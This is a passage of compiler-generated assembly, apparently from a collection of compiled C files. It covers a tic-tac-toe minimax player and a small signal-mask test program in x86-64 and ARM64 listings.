.cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $144, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -64(%rbp) movl %esi, -68(%rbp) cmpl $88, -68(%rbp) je LBB8_3 ## %bb.1: cmpl $79, -68(%rbp) je LBB8_3 ## %bb.2: leaq L_.str.1(%rip), %rdi leaq L_.str.13(%rip), %rsi xorl %eax, %eax ## kill: def $al killed $al killed $eax movb %al, -113(%rbp) ## 1-byte Spill callq _printf ## kill: def $ecx killed $eax movb -113(%rbp), %al ## 1-byte Reload leaq L_.str.3(%rip), %rdi leaq L_.str.4(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -113(%rbp), %al ## 1-byte Reload leaq L_.str.5(%rip), %rdi leaq L_.str.6(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -113(%rbp), %al ## 1-byte Reload leaq L_.str.7(%rip), %rdi leaq L_.str.8(%rip), %rsi callq _printf ## kill: def $ecx killed $eax movb -113(%rbp), %al ## 1-byte Reload leaq L_.str.9(%rip), %rdi movl $176, %esi callq _printf movl $1, %edi callq _exit LBB8_3: movq L___const.chooseMove.myBest(%rip), %rax movq %rax, -80(%rbp) movl $0, -100(%rbp) movl -68(%rbp), %eax movq _US@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB8_5 ## %bb.4: movl $-1, -80(%rbp) jmp LBB8_6 LBB8_5: movl $1, -80(%rbp) LBB8_6: movq -64(%rbp), %rdi movq _US@GOTPCREL(%rip), %rax movl (%rax), %esi callq _didHeWin cmpl $0, %eax je LBB8_8 ## %bb.7: movl $10, -56(%rbp) movl $-1, -52(%rbp) jmp LBB8_36 LBB8_8: movq -64(%rbp), %rdi movq _THEM@GOTPCREL(%rip), %rax movl (%rax), %esi callq _didHeWin cmpl $0, %eax je LBB8_10 ## %bb.9: movl $-10, -56(%rbp) movl $-1, -52(%rbp) jmp LBB8_36 LBB8_10: movq -64(%rbp), %rdi callq _isBoardFull cmpl $0, %eax je LBB8_12 ## %bb.11: movl $0, -56(%rbp) movl $-1, -52(%rbp) jmp LBB8_36 LBB8_12: jmp LBB8_13 LBB8_13: jmp LBB8_14 LBB8_14: movl $0, -92(%rbp) LBB8_15: ## =>This Inner Loop Header: Depth=1 cmpl $9, -92(%rbp) jge LBB8_20 ## %bb.16: ## in Loop: Header=BB8_15 Depth=1 movq -64(%rbp), %rax movslq -92(%rbp), %rdx leaq _convert9To25(%rip), %rcx movslq (%rcx,%rdx,4), %rcx cmpl $95, (%rax,%rcx,4) jne LBB8_18 ## %bb.17: ## in Loop: Header=BB8_15 Depth=1 movslq -92(%rbp), %rcx leaq _convert9To25(%rip), %rax movl (%rax,%rcx,4), %ecx movl -100(%rbp), %eax movl %eax, %edx addl $1, %edx movl %edx, -100(%rbp) cltq movl %ecx, -48(%rbp,%rax,4) LBB8_18: ## in Loop: Header=BB8_15 Depth=1 jmp LBB8_19 LBB8_19: ## in Loop: Header=BB8_15 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB8_15 LBB8_20: movl $0, -92(%rbp) LBB8_21: ## =>This Inner Loop Header: Depth=1 movl -92(%rbp), %eax cmpl -100(%rbp), %eax jge LBB8_24 ## %bb.22: ## in Loop: Header=BB8_21 Depth=1 jmp LBB8_23 LBB8_23: ## in Loop: Header=BB8_21 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB8_21 LBB8_24: movl $0, -92(%rbp) LBB8_25: ## =>This Inner Loop Header: Depth=1 movl -92(%rbp), %eax cmpl -100(%rbp), %eax jge LBB8_35 ## %bb.26: ## in Loop: Header=BB8_25 Depth=1 movslq -92(%rbp), %rax movl -48(%rbp,%rax,4), %eax movl %eax, -96(%rbp) movl -68(%rbp), %edx movq -64(%rbp), %rax movslq -96(%rbp), %rcx movl %edx, (%rax,%rcx,4) movq -64(%rbp), %rax movq %rax, -128(%rbp) ## 8-byte Spill movl -68(%rbp), %edi callq _otherPlayer movq -128(%rbp), %rdi ## 8-byte Reload movl %eax, %esi callq _chooseMove movq %rax, -112(%rbp) movq -112(%rbp), %rax movq %rax, -88(%rbp) movq -64(%rbp), %rax movslq -96(%rbp), %rcx movl $95, (%rax,%rcx,4) movl -68(%rbp), %eax movq _US@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB8_28 ## %bb.27: ## in Loop: Header=BB8_25 Depth=1 movl -80(%rbp), %eax cmpl -88(%rbp), %eax jl LBB8_30 LBB8_28: ## in Loop: Header=BB8_25 Depth=1 movl -68(%rbp), %eax movq _THEM@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB8_33 ## %bb.29: ## in Loop: Header=BB8_25 Depth=1 movl -80(%rbp), %eax cmpl -88(%rbp), %eax jle LBB8_33 LBB8_30: ## in Loop: Header=BB8_25 Depth=1 movl -88(%rbp), %eax movl %eax, -80(%rbp) movl -68(%rbp), %eax movq _US@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jne LBB8_32 ## %bb.31: ## in Loop: Header=BB8_25 Depth=1 movl -96(%rbp), %eax movl %eax, -76(%rbp) LBB8_32: ## in Loop: Header=BB8_25 Depth=1 jmp LBB8_33 LBB8_33: ## in Loop: Header=BB8_25 Depth=1 jmp LBB8_34 LBB8_34: ## in Loop: Header=BB8_25 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB8_25 LBB8_35: movq -80(%rbp), %rax movq %rax, -56(%rbp) LBB8_36: movq -56(%rbp), %rax movq %rax, -136(%rbp) ## 8-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB8_38 ## %bb.37: movq -136(%rbp), %rax ## 8-byte Reload addq $144, %rsp popq %rbp retq LBB8_38: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _MinMax ## -- Begin function MinMax .p2align 4, 0x90 _MinMax: ## @MinMax .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $128, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movq %rdi, -64(%rbp) movl %esi, -68(%rbp) movl $0, -72(%rbp) movl $-2, -76(%rbp) movl $-2, -80(%rbp) movl $-1, -84(%rbp) movl _ply(%rip), %eax cmpl _maxPly(%rip), %eax jle LBB9_2 ## %bb.1: movl _ply(%rip), %eax movl %eax, _maxPly(%rip) LBB9_2: movl _positions(%rip), %eax addl $1, %eax movl %eax, _positions(%rip) cmpl $0, _ply(%rip) jle LBB9_10 ## %bb.3: movq -64(%rbp), %rdi movl -68(%rbp), %esi callq _didHeWin cmpl $0, %eax je LBB9_5 ## %bb.4: movl $1, -80(%rbp) LBB9_5: movq -64(%rbp), %rax movq %rax, -104(%rbp) ## 8-byte Spill movl -68(%rbp), %edi callq _otherPlayer movq -104(%rbp), %rdi ## 8-byte Reload movl %eax, %esi callq _didHeWin cmpl $0, %eax je LBB9_7 ## %bb.6: movl $-1, -80(%rbp) LBB9_7: cmpl $0, -80(%rbp) je LBB9_9 ## %bb.8: movl -80(%rbp), %eax movl %eax, -52(%rbp) jmp LBB9_27 LBB9_9: jmp LBB9_10 LBB9_10: movl $0, -92(%rbp) LBB9_11: ## =>This Inner Loop Header: Depth=1 cmpl $9, -92(%rbp) jge LBB9_16 ## %bb.12: ## in Loop: Header=BB9_11 Depth=1 movq -64(%rbp), %rax movslq -92(%rbp), %rdx leaq _convert9To25(%rip), %rcx movslq (%rcx,%rdx,4), %rcx cmpl $95, (%rax,%rcx,4) jne LBB9_14 ## %bb.13: ## in Loop: Header=BB9_11 Depth=1 movslq -92(%rbp), %rcx leaq _convert9To25(%rip), %rax movl (%rax,%rcx,4), %ecx movl -72(%rbp), %eax movl %eax, %edx addl $1, %edx movl %edx, -72(%rbp) cltq movl %ecx, -48(%rbp,%rax,4) LBB9_14: ## in Loop: Header=BB9_11 Depth=1 jmp LBB9_15 LBB9_15: ## in Loop: Header=BB9_11 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB9_11 LBB9_16: movl $0, -92(%rbp) LBB9_17: ## =>This Inner Loop Header: Depth=1 movl -92(%rbp), %eax cmpl -72(%rbp), %eax jge LBB9_22 ## %bb.18: ## in Loop: Header=BB9_17 Depth=1 movslq -92(%rbp), %rax movl -48(%rbp,%rax,4), %eax movl %eax, -88(%rbp) movl -68(%rbp), %edx movq -64(%rbp), %rax movslq -88(%rbp), %rcx movl %edx, (%rax,%rcx,4) movl _ply(%rip), %eax addl $1, %eax movl %eax, _ply(%rip) movq -64(%rbp), %rax movq %rax, -112(%rbp) ## 8-byte Spill movl -68(%rbp), %edi callq _otherPlayer movq -112(%rbp), %rdi ## 8-byte Reload movl %eax, %esi callq _MinMax movl %eax, %ecx xorl %eax, %eax subl %ecx, %eax movl %eax, -80(%rbp) movl -80(%rbp), %eax cmpl -76(%rbp), %eax jle LBB9_20 ## %bb.19: ## in Loop: Header=BB9_17 Depth=1 movl -80(%rbp), %eax movl %eax, -76(%rbp) movl -88(%rbp), %eax movl %eax, -84(%rbp) LBB9_20: ## in Loop: Header=BB9_17 Depth=1 movq -64(%rbp), %rax movslq -88(%rbp), %rcx movl $95, (%rax,%rcx,4) movl _ply(%rip), %eax addl $-1, %eax movl %eax, _ply(%rip) ## %bb.21: ## in Loop: Header=BB9_17 Depth=1 movl -92(%rbp), %eax addl $1, %eax movl %eax, -92(%rbp) jmp LBB9_17 LBB9_22: cmpl $0, -72(%rbp) jne LBB9_24 ## %bb.23: movq -64(%rbp), %rdi movl -68(%rbp), %esi callq _didHeWin movl %eax, -76(%rbp) LBB9_24: cmpl $0, _ply(%rip) je LBB9_26 ## %bb.25: movl -76(%rbp), %eax movl %eax, -52(%rbp) jmp LBB9_27 LBB9_26: movl -84(%rbp), %eax movl %eax, -52(%rbp) LBB9_27: movl -52(%rbp), %eax movl %eax, -116(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB9_29 ## %bb.28: movl -116(%rbp), %eax ## 4-byte Reload addq $128, %rsp popq %rbp retq LBB9_29: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _nextMove ## -- Begin function nextMove .p2align 4, 0x90 _nextMove: ## @nextMove .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $160, %rsp movb %dil, %al movq ___stack_chk_guard@GOTPCREL(%rip), %rcx movq (%rcx), %rcx movq %rcx, -8(%rbp) movb %al, -113(%rbp) movq %rsi, -128(%rbp) leaq -112(%rbp), %rdi movq -128(%rbp), %rsi callq _initializeBoard movsbl -113(%rbp), %ecx movq _US@GOTPCREL(%rip), %rax movl %ecx, (%rax) movq _US@GOTPCREL(%rip), %rax movl (%rax), %edi callq _otherPlayer movl %eax, %ecx movq _THEM@GOTPCREL(%rip), %rax movl %ecx, (%rax) leaq -112(%rbp), %rdi movsbl -113(%rbp), %esi callq _chooseMove movq %rax, -160(%rbp) movq -160(%rbp), %rax movq %rax, -152(%rbp) movl -148(%rbp), %edi callq _convert1dTo2d movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB10_2 ## %bb.1: addq $160, %rsp popq %rbp retq LBB10_2: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -24(%rbp) leaq L_.str.14(%rip), %rdi leaq -29(%rbp), %rsi movb $0, %al callq _scanf movl $0, -28(%rbp) LBB11_1: ## =>This Inner Loop Header: Depth=1 cmpl $3, -28(%rbp) jge LBB11_4 ## %bb.2: ## in Loop: Header=BB11_1 Depth=1 movslq -28(%rbp), %rax leaq -17(%rbp), %rsi imulq $3, %rax, %rax addq %rax, %rsi leaq L_.str.15(%rip), %rdi movb $0, %al callq _scanf ## %bb.3: ## in Loop: Header=BB11_1 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB11_1 LBB11_4: movb -29(%rbp), %al leaq -17(%rbp), %rsi movsbl %al, %edi callq _nextMove movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB11_6 ## %bb.5: xorl %eax, %eax addq $32, %rsp popq %rbp retq LBB11_6: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __DATA,__data .globl _convert9To25 ## @convert9To25 .p2align 4 _convert9To25: .long 6 ## 0x6 .long 7 ## 0x7 .long 8 ## 0x8 .long 11 ## 0xb .long 12 ## 0xc .long 13 ## 0xd .long 16 ## 0x10 .long 17 ## 0x11 .long 18 ## 0x12 .globl _score ## @score .p2align 4 _score: .long 10 ## 0xa .long 5 ## 0x5 .long 10 ## 0xa .long 5 ## 0x5 .long 20 ## 0x14 .long 5 ## 0x5 .long 10 ## 0xa .long 5 ## 0x5 .long 10 ## 0xa .globl _convert25To9 ## @convert25To9 .p2align 4 _convert25To9: .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 0 ## 0x0 .long 1 ## 0x1 .long 2 ## 0x2 .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 3 ## 0x3 .long 4 ## 0x4 .long 5 ## 0x5 .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 6 ## 0x6 .long 7 ## 0x7 .long 8 ## 0x8 .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .globl _directions ## @directions .p2align 4 _directions: .long 1 ## 0x1 .long 5 ## 0x5 .long 6 ## 0x6 .long 4 ## 0x4 .section __TEXT,__const .p2align 4 ## @__const.convert1dTo2d.xyMoves l___const.convert1dTo2d.xyMoves: .space 8 .long 0 ## 0x0 .long 1 ## 0x1 .long 0 ## 0x0 .long 2 ## 0x2 .long 1 ## 0x1 .long 0 ## 0x0 .long 1 ## 0x1 .long 1 ## 0x1 .long 1 ## 0x1 .long 2 ## 0x2 .long 2 ## 0x2 .long 0 ## 0x0 .long 2 ## 0x2 .long 1 ## 0x1 .long 2 ## 0x2 .long 2 ## 0x2 .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d %d\n" L_.str.1: ## @.str.1 .asciz "%s - Failed" L_.str.2: ## @.str.2 .asciz "player == OPL || player == XPL" L_.str.3: ## @.str.3 .asciz "On %s " L_.str.4: ## @.str.4 .asciz "Jan 13 2025" L_.str.5: ## @.str.5 .asciz "At %s " L_.str.6: ## @.str.6 .asciz "08:34:16" L_.str.7: ## @.str.7 .asciz "In File %s " L_.str.8: ## @.str.8 .asciz "the_stack_data/54824855.c" L_.str.9: ## @.str.9 .asciz "At Line %d\n" L_.str.10: ## @.str.10 .asciz "posIn25 > 0 || posIn25 < 25" L_.str.11: ## @.str.11 .asciz "\n" L_.str.12: ## @.str.12 .asciz "%c " .globl _depth ## @depth .zerofill __DATA,__common,_depth,4,2 L_.str.13: ## @.str.13 .asciz "player == XPL || player == OPL" .section __TEXT,__literal8,8byte_literals .p2align 2 ## @__const.chooseMove.myBest L___const.chooseMove.myBest: .long 0 ## 0x0 .long 4294967295 ## 0xffffffff .comm _US,4,2 ## @US .comm _THEM,4,2 ## @THEM .globl _ply ## @ply .zerofill __DATA,__common,_ply,4,2 .globl _positions ## @positions .zerofill __DATA,__common,_positions,4,2 .globl _maxPly ## @maxPly .zerofill __DATA,__common,_maxPly,4,2 .section __TEXT,__cstring,cstring_literals L_.str.14: ## @.str.14 .asciz "%c" L_.str.15: ## @.str.15 .asciz "%s[^\n]%*c" .subsections_via_symbols
the_stack_data/54824855.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] add x1, sp, #8 adrp x8, _HandleUSR1@PAGE add x8, x8, _HandleUSR1@PAGEOFF str x8, [sp, #8] str wzr, [sp, #16] str wzr, [sp, #20] mov w0, #30 mov x2, #0 bl _sigaction adds w8, w0, #1 cset w8, ne tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] adrp x1, l_.str@PAGE add x1, x1, l_.str@PAGEOFF bl _fprintf mov w8, #1 stur w8, [x29, #-4] b LBB0_7 LBB0_2: add x1, sp, #8 adrp x8, _HandleUSR2@PAGE add x8, x8, _HandleUSR2@PAGEOFF str x8, [sp, #8] mov w0, #31 mov x2, #0 bl _sigaction adds w8, w0, #1 cset w8, ne tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] adrp x1, l_.str.1@PAGE add x1, x1, l_.str.1@PAGEOFF bl _fprintf mov w8, #1 stur w8, [x29, #-4] b LBB0_7 LBB0_4: mov w0, #30 bl _raise mov w0, #0 bl _CheckMask subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: mov w8, #1 stur w8, [x29, #-4] b LBB0_7 LBB0_6: stur wzr, [x29, #-4] b LBB0_7 LBB0_7: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function HandleUSR1 _HandleUSR1: ; @HandleUSR1 .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] mov x8, sp str xzr, [x8] mov w0, #30 bl _CheckMask subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: mov w0, #1 bl _exit LBB1_2: mov w0, #31 bl _raise ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function HandleUSR2 _HandleUSR2: ; @HandleUSR2 .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] mov x8, sp mov x9, #31 str x9, [x8] str xzr, [x8, #8] mov w0, #30 bl _CheckMask subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: mov w0, #1 bl _exit LBB2_2: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .p2align 2 ; -- Begin function CheckMask _CheckMask: ; @CheckMask .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-28] mov w0, #3 mov x1, #0 sub x2, x29, #32 bl _sigprocmask stur wzr, [x29, #-36] ldur w8, [x29, #-28] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_11 b LBB3_1 LBB3_1: ldur w8, [x29, #-28] stur w8, [x29, #-4] ldur w8, [x29, #-4] subs w8, w8, #32 cset w8, le tbnz w8, #0, LBB3_3 b LBB3_2 LBB3_2: mov w8, #0 str w8, [sp, #52] ; 4-byte Folded Spill b LBB3_4 LBB3_3: ldur w9, [x29, #-4] mov w8, #1 subs w9, w9, #1 lsl w8, w8, w9 str w8, [sp, #52] ; 4-byte Folded Spill b LBB3_4 LBB3_4: ldr w9, [sp, #52] ; 4-byte Folded Reload ldur w8, [x29, #-36] orr w8, w8, w9 stur w8, [x29, #-36] sub x9, x29, #48 add x8, x29, #16 str x8, [x9] b LBB3_5 LBB3_5: ; =>This Inner Loop Header: Depth=1 ldur x9, [x29, #-48] ldr w8, [x9] add x9, x9, #8 stur x9, [x29, #-48] str w8, [sp, #56] ldr w8, [sp, #56] stur w8, [x29, #-28] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB3_10 b LBB3_6 LBB3_6: ; in Loop: Header=BB3_5 Depth=1 ldur w8, [x29, #-28] stur w8, [x29, #-8] ldur w8, [x29, #-8] subs w8, w8, #32 cset w8, le tbnz w8, #0, LBB3_8 b LBB3_7 LBB3_7: ; in Loop: Header=BB3_5 Depth=1 mov w8, #0 str w8, [sp, #48] ; 4-byte Folded Spill b LBB3_9 LBB3_8: ; in Loop: Header=BB3_5 Depth=1 ldur w9, [x29, #-8] mov w8, #1 subs w9, w9, #1 lsl w8, w8, w9 str w8, [sp, #48] ; 4-byte Folded Spill b LBB3_9 LBB3_9: ; in Loop: Header=BB3_5 Depth=1 ldr w9, [sp, #48] ; 4-byte Folded Reload ldur w8, [x29, #-36] orr w8, w8, w9 stur w8, [x29, #-36] b LBB3_5 LBB3_10: b LBB3_11 LBB3_11: mov w8, #1 stur w8, [x29, #-52] stur w8, [x29, #-28] b LBB3_12 LBB3_12: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-28] subs w8, w8, #32 cset w8, ge tbnz w8, #0, LBB3_33 b LBB3_13 LBB3_13: ; in Loop: Header=BB3_12 Depth=1 ldur w8, [x29, #-32] str w8, [sp, #44] ; 4-byte Folded Spill ldur w8, [x29, #-28] stur w8, [x29, #-12] ldur w8, [x29, #-12] subs w8, w8, #32 cset w8, le tbnz w8, #0, LBB3_15 b LBB3_14 LBB3_14: ; in Loop: Header=BB3_12 Depth=1 mov w8, #0 str w8, [sp, #40] ; 4-byte Folded Spill b LBB3_16 LBB3_15: ; in Loop: Header=BB3_12 Depth=1 ldur w9, [x29, #-12] mov w8, #1 subs w9, w9, #1 lsl w8, w8, w9 str w8, [sp, #40] ; 4-byte Folded Spill b LBB3_16 LBB3_16: ; in Loop: Header=BB3_12 Depth=1 ldr w8, [sp, #44] ; 4-byte Folded Reload ldr w9, [sp, #40] ; 4-byte Folded Reload ands w8, w8, w9 cset w8, ne tbnz w8, #0, LBB3_22 b LBB3_17 LBB3_17: ; in Loop: Header=BB3_12 Depth=1 ldur w8, [x29, #-36] str w8, [sp, #36] ; 4-byte Folded Spill ldur w8, [x29, #-28] stur w8, [x29, #-16] ldur w8, [x29, #-16] subs w8, w8, #32 cset w8, le tbnz w8, #0, LBB3_19 b LBB3_18 LBB3_18: ; in Loop: Header=BB3_12 Depth=1 mov w8, #0 str w8, [sp, #32] ; 4-byte Folded Spill b LBB3_20 LBB3_19: ; in Loop: Header=BB3_12 Depth=1 ldur w9, [x29, #-16] mov w8, #1 subs w9, w9, #1 lsl w8, w8, w9 str w8, [sp, #32] ; 4-byte Folded Spill b LBB3_20 LBB3_20: ; in Loop: Header=BB3_12 Depth=1 ldr w8, [sp, #36] ; 4-byte Folded Reload ldr w9, [sp, #32] ; 4-byte Folded Reload ands w8, w8, w9 cset w8, eq tbnz w8, #0, LBB3_22 b LBB3_21 LBB3_21: ; in Loop: Header=BB3_12 Depth=1 adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] ldur w9, [x29, #-28] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x1, l_.str.2@PAGE add x1, x1, l_.str.2@PAGEOFF bl _fprintf stur wzr, [x29, #-52] b LBB3_22 LBB3_22: ; in Loop: Header=BB3_12 Depth=1 ldur w8, [x29, #-32] str w8, [sp, #28] ; 4-byte Folded Spill ldur w8, [x29, #-28] stur w8, [x29, #-20] ldur w8, [x29, #-20] subs w8, w8, #32 cset w8, le tbnz w8, #0, LBB3_24 b LBB3_23 LBB3_23: ; in Loop: Header=BB3_12 Depth=1 mov w8, #0 str w8, [sp, #24] ; 4-byte Folded Spill b LBB3_25 LBB3_24: ; in Loop: Header=BB3_12 Depth=1 ldur w9, [x29, #-20] mov w8, #1 subs w9, w9, #1 lsl w8, w8, w9 str w8, [sp, #24] ; 4-byte Folded Spill b LBB3_25 LBB3_25: ; in Loop: Header=BB3_12 Depth=1 ldr w8, [sp, #28] ; 4-byte Folded Reload ldr w9, [sp, #24] ; 4-byte Folded Reload ands w8, w8, w9 cset w8, eq tbnz w8, #0, LBB3_31 b LBB3_26 LBB3_26: ; in Loop: Header=BB3_12 Depth=1 ldur w8, [x29, #-36] str w8, [sp, #20] ; 4-byte Folded Spill ldur w8, [x29, #-28] stur w8, [x29, #-24] ldur w8, [x29, #-24] subs w8, w8, #32 cset w8, le tbnz w8, #0, LBB3_28 b LBB3_27 LBB3_27: ; in Loop: Header=BB3_12 Depth=1 mov w8, #0 str w8, [sp, #16] ; 4-byte Folded Spill b LBB3_29 LBB3_28: ; in Loop: Header=BB3_12 Depth=1 ldur w9, [x29, #-24] mov w8, #1 subs w9, w9, #1 lsl w8, w8, w9 str w8, [sp, #16] ; 4-byte Folded Spill b LBB3_29 LBB3_29: ; in Loop: Header=BB3_12 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload ldr w9, [sp, #16] ; 4-byte Folded Reload ands w8, w8, w9 cset w8, ne tbnz w8, #0, LBB3_31 b LBB3_30 LBB3_30: ; in Loop: Header=BB3_12 Depth=1 adrp x8, ___stderrp@GOTPAGE ldr x8, [x8, ___stderrp@GOTPAGEOFF] ldr x0, [x8] ldur w9, [x29, #-28] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x1, l_.str.3@PAGE add x1, x1, l_.str.3@PAGEOFF bl _fprintf stur wzr, [x29, #-52] b LBB3_31 LBB3_31: ; in Loop: Header=BB3_12 Depth=1 b LBB3_32 LBB3_32: ; in Loop: Header=BB3_12 Depth=1 ldur w8, [x29, #-28] add w8, w8, #1 stur w8, [x29, #-28] b LBB3_12 LBB3_33: ldur w0, [x29, #-52] ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Unable handle signal USR1\n" l_.str.1: ; @.str.1 .asciz "Unable handle signal USR2\n" l_.str.2: ; @.str.2 .asciz "Mask missing signal %d\n" l_.str.3: ; @.str.3 .asciz "Mask unexpectedly has signal %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) leaq _HandleUSR1(%rip), %rax movq %rax, -24(%rbp) movl $0, -16(%rbp) movl $0, -12(%rbp) movl $30, %edi leaq -24(%rbp), %rsi xorl %eax, %eax movl %eax, %edx callq _sigaction cmpl $-1, %eax jne LBB0_2 ## %bb.1: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str(%rip), %rsi movb $0, %al callq _fprintf movl $1, -4(%rbp) jmp LBB0_7 LBB0_2: leaq _HandleUSR2(%rip), %rax movq %rax, -24(%rbp) movl $31, %edi leaq -24(%rbp), %rsi xorl %eax, %eax movl %eax, %edx callq _sigaction cmpl $-1, %eax jne LBB0_4 ## %bb.3: movq ___stderrp@GOTPCREL(%rip), %rax movq (%rax), %rdi leaq L_.str.1(%rip), %rsi movb $0, %al callq _fprintf movl $1, -4(%rbp) jmp LBB0_7 LBB0_4: movl $30, %edi callq _raise xorl %edi, %edi movb $0, %al callq _CheckMask cmpl $0, %eax jne LBB0_6 ## %bb.5: movl $1, -4(%rbp) jmp LBB0_7 LBB0_6: movl $0, -4(%rbp) LBB0_7: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .p2align 4, 0x90 ## -- Begin function HandleUSR1 _HandleUSR1: ## @HandleUSR1 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl $30, %edi xorl %esi, %esi movb $0, %al callq _CheckMask cmpl $0, %eax jne LBB1_2 ## %bb.1: movl $1, %edi callq _exit LBB1_2: movl $31, %edi callq _raise addq $16, %rsp popq %rbp retq 